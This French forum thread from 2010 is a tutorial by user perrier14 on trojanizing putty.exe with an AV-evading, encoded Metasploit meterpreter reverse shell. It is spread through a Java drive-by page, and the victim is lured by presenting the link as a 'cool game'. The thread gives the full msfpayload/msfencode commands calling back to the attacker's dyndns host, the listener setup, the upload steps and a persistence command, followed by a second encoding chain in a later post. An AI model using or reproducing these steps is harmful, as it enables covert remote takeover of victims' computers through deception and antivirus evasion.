Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-09-2010 07:53:24

perrier14
Banni(e)
Inscription : 25-09-2010
Messages : 22

payload metasploit crypté + java drive by

j'ai envie d'ecrire un tuto sur ca, je viens de tester et c'est vraiment puissant limite malsain, pas (encore) testé en remote... on peux faire aussi le meme genre de truc avec le social enginnering tookit integré a backtrack ..

l'idée c de faire du java drive by avec un backdoor crypté avec shikata_ga_nai et integré a putty.exe. (7/43 sur virustotal)

avant tout, pensez a portforwarder le port 4444 en écoute vers votre machine backtrack...

telecharger putty.exe:

http://the.earth.li/~sgtatham/putty/lat … /putty.exe

placer putty.exe sur le bureau de backtrack 4.

création du backdoor dans msfconsole:

./msfpayload windows/meterpreter/reverse_tcp LHOST=your.dyndns.org LPORT=4444 R | ./msfencode -c 10 -t exe -x /root/putty.exe -o /root/backdoor.exe

mise en écoute:

./msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

upload du backdoor.exe sur uploadvillage.

http://www.uploadvillage.com/

noter le lien du fichier uploadé (virer les URL de chaque cotél)

download du javadrive by:

http://www.multiupload.com/FI90XXVIAW

inscrivez vous sur fileave.com et uploadez les fichiers du javadrive by (les 6 fichier du dossier Java Applet):

http://www.fileave.com/

client.jar
index.html
index2.html
java.png
load.gif
softpedia.gif

Editer le fichier index2.html et remplacer les 2 YOUR URL HERE (a coté de wget et de winconfig.vbs) par l'adresse du fichier uploadé sur uploadvillage (sans les URL for sure)

click sur sauver.

Retourner sur le panel racine et copiez le lien du fichier index.html (http://votresite.fileave.com/index.html) et envoyez le a votre victime ou sur un forum en pretextant que c'est un jeu trés cool

si la victime active java, vous aurez directement un reverse shell sur sa machine.

on peut aussi maintenir un acces avec persistence:

meterpreter > run persistence -X -A -i 30 -p 31337 -r your.dyndns.org

PS: il faut recompiler l'exploit depuis le depart si on veut recommencer aprés avoir redemarré backtrack.

a vos risques et périls, pas responsable de vos actes.

FIN.

une petite video ou un mec fait la meme chose avec un RAT

http://www.youtube.com/watch?v=tlpmYap2U98

Dernière modification par perrier14 (25-09-2010 10:15:15)


You can't fuck me, i'm insane.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-09-2010 00:04:11

Raphu
Membre Indétronable
Lieu : localhost
Inscription : 09-06-2009
Messages : 192

Re : payload metasploit crypté + java drive by

Merci perrier14 pour ces explications. Pour les intéressés, un sujet assez proche avait été ouvert ici.
Bon pentest!

Hors Ligne

#3 27-09-2010 06:29:55

perrier14
Banni(e)
Inscription : 25-09-2010
Messages : 22

Re : payload metasploit crypté + java drive by

le plus compliqué reste de faire accepter le java a la victime... pas encore pu avoir de remote shell, mais pas insisté non plus.

au niveau de l'encryptage de payload, je vois des imbécilités sur google, c'est affolant..

http://blog.gaetan-grigis.eu/systeme/me … ge-facile/

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=4444 | ./msfencode -e x86/shikata_ga_nai -t raw | ./msfencode -e x86/fnstenv_mov -t raw | ./msfencode -t exe -o rmeter.exe

lol quoi il bousille son backdoor, ya qu'a tester, c'est pa detecté par les antivirus mais ca fonctionne pas du tout aussi..

les mecs postent des trucs et testent meme pas si leur shell fonctionne correctement..

Dernière modification par perrier14 (27-09-2010 06:52:22)


You can't fuck me, i'm insane.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.074 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]